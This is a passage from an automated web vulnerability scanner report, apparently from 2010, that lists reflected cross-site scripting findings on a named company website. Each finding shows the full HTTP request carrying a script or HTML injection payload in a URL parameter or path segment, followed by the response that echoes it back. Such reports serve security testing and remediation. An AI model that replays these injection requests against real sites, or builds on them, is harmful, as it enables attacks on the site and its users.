<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/d16ad"><script>alert(1)</script>f9823fc564f#up">
...[SNIP]...

1.58. http://anite.com/autonomous-testing-networkmeasurement.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/autonomous-testing-networkmeasurement.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3921a"><a>e7d67a1c057 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /autonomous-testing-networkmeasurement.html?Itemid=4513921a"><a>e7d67a1c057 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/autonomous-testing-networkmeasurement.html?Itemid=4513921a"><a>e7d67a1c057#up">
...[SNIP]...

1.59. http://anite.com/autonomous-testing-networkmeasurement.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/autonomous-testing-networkmeasurement.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696a0"><script>alert(1)</script>2bb0ba95034 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /696a0"><script>alert(1)</script>2bb0ba95034 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/696a0"><script>alert(1)</script>2bb0ba95034#up">
...[SNIP]...

1.60. http://anite.com/autonomous-testing-networkmeasurement.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/autonomous-testing-networkmeasurement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d19"><a>d04f81b617b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /autonomous-testing-networkmeasurement.html?19d19"><a>d04f81b617b=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/autonomous-testing-networkmeasurement.html?19d19"><a>d04f81b617b=1#up">
...[SNIP]...

1.61. http://anite.com/bench-marking-networkmeasurement.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/bench-marking-networkmeasurement.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a83"><a>14d67dd6cfe was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bench-marking-networkmeasurement.html?Itemid=44824a83"><a>14d67dd6cfe HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/bench-marking-networkmeasurement.html?Itemid=44824a83"><a>14d67dd6cfe#up">
...[SNIP]...

1.62. http://anite.com/bench-marking-networkmeasurement.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/bench-marking-networkmeasurement.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3285"><script>alert(1)</script>9e0e76e11d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e3285"><script>alert(1)</script>9e0e76e11d HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/e3285"><script>alert(1)</script>9e0e76e11d#up">
...[SNIP]...

1.63. http://anite.com/bench-marking-networkmeasurement.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/bench-marking-networkmeasurement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33696"><a>9e1663e229e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bench-marking-networkmeasurement.html?33696"><a>9e1663e229e=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/bench-marking-networkmeasurement.html?33696"><a>9e1663e229e=1#up">
...[SNIP]...

1.64. http://anite.com/business-critical-application-management-anite.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/business-critical-application-management-anite.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac29b"><a>c130b8e0573 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /business-critical-application-management-anite.html?Itemid=113ac29b"><a>c130b8e0573 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/business-critical-application-management-anite.html?Itemid=113ac29b"><a>c130b8e0573#up">
...[SNIP]...

1.65. http://anite.com/business-critical-application-management-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/business-critical-application-management-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abd9c"><script>alert(1)</script>c01a8a6e173 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /abd9c"><script>alert(1)</script>c01a8a6e173 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/abd9c"><script>alert(1)</script>c01a8a6e173#up">
...[SNIP]...

1.66. http://anite.com/business-critical-application-management-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/business-critical-application-management-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bab"><a>4271c2cf076 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /business-critical-application-management-anite.html?b4bab"><a>4271c2cf076=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/business-critical-application-management-anite.html?b4bab"><a>4271c2cf076=1#up">
...[SNIP]...

1.67. http://anite.com/contact-travel-mainmenu-272/website-information/travel-solutions-support.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/contact-travel-mainmenu-272/website-information/travel-solutions-support.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 599d4"><a>67fdb941688 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact-travel-mainmenu-272/website-information/travel-solutions-support.html?Itemid=272599d4"><a>67fdb941688 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-travel-mainmenu-272/website-information/travel-solutions-support.html?Itemid=272599d4"><a>67fdb941688#up">
...[SNIP]...

1.68. http://anite.com/contact-travel-mainmenu-272/website-information/travel-solutions-support.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/contact-travel-mainmenu-272/website-information/travel-solutions-support.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62db5"><script>alert(1)</script>c9989222586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-travel-mainmenu-27262db5"><script>alert(1)</script>c9989222586/website-information/travel-solutions-support.html HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-travel-mainmenu-27262db5"><script>alert(1)</script>c9989222586/website-information/travel-solutions-support.html#up">
...[SNIP]...

1.69. http://anite.com/contact-travel-mainmenu-272/website-information/travel-solutions-support.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/contact-travel-mainmenu-272/website-information/travel-solutions-support.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4856"><script>alert(1)</script>9052ffc0a49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-travel-mainmenu-272/website-informationb4856"><script>alert(1)</script>9052ffc0a49/travel-solutions-support.html HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-travel-mainmenu-272/website-informationb4856"><script>alert(1)</script>9052ffc0a49/travel-solutions-support.html#up">
...[SNIP]...

1.70. http://anite.com/contact-travel-mainmenu-272/website-information/travel-solutions-support.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/contact-travel-mainmenu-272/website-information/travel-solutions-support.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c56"><script>alert(1)</script>f07ae459234 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-travel-mainmenu-272/website-information/c9c56"><script>alert(1)</script>f07ae459234 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-travel-mainmenu-272/website-information/c9c56"><script>alert(1)</script>f07ae459234#up">
...[SNIP]...

1.71. http://anite.com/contact-travel-mainmenu-272/website-information/travel-solutions-support.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/contact-travel-mainmenu-272/website-information/travel-solutions-support.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a02"><a>de829f3b4ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact-travel-mainmenu-272/website-information/travel-solutions-support.html?64a02"><a>de829f3b4ff=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/contact-travel-mainmenu-272/website-information/travel-solutions-support.html?64a02"><a>de829f3b4ff=1#up">
...[SNIP]...

1.72. http://anite.com/contact-us-travel-100/website-information/anite-travel-systems.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/contact-us-travel-100/website-information/anite-travel-systems.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bccab"><a>cd9f07ed8a8 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact-us-travel-100/website-information/anite-travel-systems.html?Itemid=415bccab"><a>cd9f07ed8a8 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:26 GMT
